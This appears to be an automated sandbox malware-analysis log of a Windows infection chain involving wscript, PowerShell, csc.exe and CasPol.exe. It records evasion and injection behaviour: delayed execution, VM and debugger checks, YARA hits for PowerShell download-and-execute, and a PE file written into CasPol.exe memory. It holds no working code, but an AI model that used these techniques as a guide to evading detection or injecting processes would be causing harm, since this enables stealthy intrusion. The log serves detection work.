Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_0040E54F Sleep,ExitProcess,

11_2_0040E54F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

11_2_004198D2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7002	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2572	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4133	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5589	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 814	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 9169	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

API coverage: 9.0 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2996	Thread sleep count: 7002 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4868	Thread sleep count: 2572 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1976	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6368	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 716	Thread sleep count: 814 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 716	Thread sleep time: -2442000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 716	Thread sleep count: 9169 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 716	Thread sleep time: -27507000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	11_2_0041B43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0044D5F9 FindFirstFileExA,	11_2_0044D5F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	11_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00406AC2 FindFirstFileW,FindNextFileW,	11_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	11_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_00418C79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	11_2_00408DA7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_00406F06

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000008.00000002.2465755195.0000000007421000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
Source: powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.2205005983.00000000070FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
Source: powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: wscript.exe, 00000007.00000002.2187737206.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: powershell.exe, 00000003.00000002.2201548763.0000000002D0D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2206466592.000000000801E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2206861325.000000000809F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.2205005983.00000000070FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: wscript.exe, 00000007.00000002.2187737206.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Z3
Source: CasPol.exe, 0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

API call chain: ExitProcess graph end node

graph_11-47547

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

11_2_0043A66D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

11_2_0041BCF3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_00442564 mov eax, dword ptr fs:[00000030h]

11_2_00442564

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_0044E93E GetProcessHeap,

11_2_0044E93E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00434178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0043A66D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00433B54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00433CE7 SetUnhandledExceptionFilter,	11_2_00433CE7

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi32_2704.amsi.csv, type: OTHER

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_2704.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: EC9008	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

11_2_00410F36

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

